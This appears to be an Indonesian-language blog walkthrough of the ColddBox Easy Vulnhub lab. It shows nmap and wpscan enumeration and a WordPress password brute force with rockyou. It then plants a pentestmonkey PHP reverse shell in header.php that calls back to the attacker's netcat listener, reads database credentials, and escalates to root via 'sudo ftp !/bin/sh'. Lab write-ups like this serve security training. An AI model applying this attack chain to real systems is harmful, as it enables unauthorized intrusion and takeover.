Skip to main content

Walkthrough Coldbox Easy (Vulnhub)

· 11 min read
Mochamad Jazuly
Mochamad Jazuly
Cybersecurity Analyst

Methodology

  1. Network Scanning
  2. Enumeration/ Reconnaissance
  3. Uploading a Reverse Shell
  4. Privilege Escalation

1. Network Scanning

kali ip : 192.168.11.112

  • Mencari IP target.
netdiscover -r 192.168.11.111

  • memastikan target dengan cek halaman webnya menggunakan whatweb.
whatweb 192.168.11.110

2. Enumeration/ Reconnaissance

  • menggunakan bantuan nmap.
nmap -p- -A -v 192.168.11.110

result :

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-25 10:54 WIB
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating ARP Ping Scan at 10:54
Scanning 192.168.11.110 [1 port]
Completed ARP Ping Scan at 10:54, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:54
Completed Parallel DNS resolution of 1 host. at 10:54, 0.20s elapsed
Initiating SYN Stealth Scan at 10:54
Scanning 192.168.11.110 [65535 ports]
Discovered open port 80/tcp on 192.168.11.110
Discovered open port 4512/tcp on 192.168.11.110
Completed SYN Stealth Scan at 10:54, 1.28s elapsed (65535 total ports)
Initiating Service scan at 10:54
Scanning 2 services on 192.168.11.110
Completed Service scan at 10:54, 6.05s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.11.110
NSE: Script scanning 192.168.11.110.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.38s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.02s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Nmap scan report for 192.168.11.110
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
|_http-title: ColddBox | One more machine
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
4512/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
|   256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
|_  256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
MAC Address: 08:00:27:7F:58:71 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.014 days (since Tue Jan 25 10:34:12 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.49 ms 192.168.11.110

NSE: Script Post-scanning.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.91 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)
  • dari hasil nmap di atas, didapatkan informasi sbb:
port : 80/tcp | service : http | version : Apache httpd 2.4.18
port : 4512/tcp | service : ssh | version : OpenSSH 7.2p2
  • kita akan coba explore port 80, dengan cara membuka halaman web nya via browser.

  • kita coba klik login, maka akan didapatkan halaman login seperti pada cms wordpress.

  • karena diketahui target menggunakan cms wordpress, maka akan coba kita explore menggunakan tool wpscan.

wpscan --url 192.168.11.110 --enumerate u

result :

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.11.110/ [192.168.11.110]
[+] Started: Tue Jan 25 11:25:01 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.11.110/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.11.110/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.11.110/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.11.110/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
 |  - http://192.168.11.110/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>

[+] WordPress theme in use: twentyfifteen
 | Location: http://192.168.11.110/wp-content/themes/twentyfifteen/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://192.168.11.110/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.0
 | Style URL: http://192.168.11.110/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.11.110/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=====================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] the cold in person
 | Found By: Rss Generator (Passive Detection)

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] c0ldd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jan 25 11:25:03 2022
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 14.57 KB
[+] Data Received: 264.837 KB
[+] Memory used: 181.254 MB
[+] Elapsed time: 00:00:02
  • kita mendapatkan beberapa kemungkinan username, di antaranya hugo, c0ldd dan philip.
  • kita akan coba explore lebih lanjut menggunakan username c0ldd.
wpscan --url 192.168.11.110 --usernames c0ldd --passwords /usr/share/wordlists/rockyou.txt

result :

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.11.110/ [192.168.11.110]
[+] Started: Tue Jan 25 11:29:53 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.11.110/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.11.110/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.11.110/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.11.110/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
 |  - http://192.168.11.110/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>

[+] WordPress theme in use: twentyfifteen
 | Location: http://192.168.11.110/wp-content/themes/twentyfifteen/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://192.168.11.110/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.0
 | Style URL: http://192.168.11.110/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.11.110/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <====================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - c0ldd / 9876543210                                                                                     
Trying c0ldd / bigdaddy Time: 00:00:11 <                                  > (1225 / 14345617)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
| Username: c0ldd, Password: 9876543210

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jan 25 11:30:09 2022
[+] Requests Done: 1366
[+] Cached Requests: 36
[+] Data Sent: 445.834 KB
[+] Data Received: 4.514 MB
[+] Memory used: 239.105 MB
[+] Elapsed time: 00:00:16
  • dari sini kita mengetahui bahwa terdapat akun c0ldd:9876543210.
  • Login ke wordpress menggunakan akun c0ldd:9876543210.
  • Hasilnya akan masuk ke dalam admin dashboard.

3. Uploading a Reverse Shell

  • upload reverse shell pada file header.php (Menu Appearance -> Editor -> Header (header.php)).
  • kita akan coba menggunakan php-reverse-shell by pentestmonkey.
  • ubah isi file header.php menjadi php-reverse-hell.
  • perlu penyesuaian pada baris IP (line 49) dan port (line 50) kemudian simpan/update file.
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS

menjadi :

$ip = '192.168.11.111'; // ubah sesuai ip attacker/kali
$port = 4545; // ubah port sesuai kebutuhan
  • pada terminal kali, kita menggunakan tool netcat dg listen port 4545.
nc -lvp 4545
  • sekarang kita hanya menunggu terkoneksi, untuk terkoneksi kita perlu membuka alamat ip/adress pada browser.
nc -lvp 4545
listening on [any] 4545 ...
192.168.11.110: inverse host lookup failed: Unknown host
connect to [192.168.11.111] from (UNKNOWN) [192.168.11.110] 43064
Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 06:04:15 up  1:35,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
  • yes, we are in. sekrang kita buka pythin spawned shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
  • kita coba explore pada file wp-config.php
cd /var/www/html/

more wp-config.php
  • dari sini kita mengetahui beberapa informasi, di antaranya
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');

/** MySQL database username */
define('DB_USER', 'c0ldd');
/** MySQL database password */
define('DB_PASSWORD', 'cybersecurity');
  • kita akan coba melakukan login pada sistem menggunakan akun c0ldd:cybersecurity.
su c0ldd
  • sekarang kita masuk sebagai c0ldd -> c0ldd@ColddBox-Easy:/var/www/html$
  • dari sini kita akan coba ekskalasi untuk mendapatkan hak akses root. Sebelumnya kita akan cari flag-1 pada dir home.
cd
ls
cat user.txt
  • kita mendapatkan file user.txt dg isi RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==. Ini seperti base64 encoding, maka coba ktia decode.
echo "RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==" | base64 -d
  • kita mendapatkan kalimat "Felicidades, primer nivel conseguido!", artinya -> "Selamat, level pertama tercapai!"

4. Privilege Escalation

  • kita akan coba melihat daftar binary files yang dapat digunakan oleh root.
sudo -l

result :

Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
c0ldd@ColddBox-Easy:~$
  • sekrang kita menggunakan GFTOBins untuk exploit binaries di atas. Kita coba menggunakan ftp. Kita bisa mempelajarinya di sini
sudo ftp
ftp> !/bin/sh
whoami
python3 -c 'import pty;pty.spawn("/bin/bash")'
  • sekarang kita memeili akses root, kemudian kita cari flag-2 pada dir home.
cd /root/
ls
cat root.txt
echo "wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=" | base64 -d
  • kita mendapatkan isi dari file root.txt -> ¡Felicidades, máquina completada!, yang artinya Selamat, mesin selesai!

referensi: infosecwriteups.com

buy me a coffee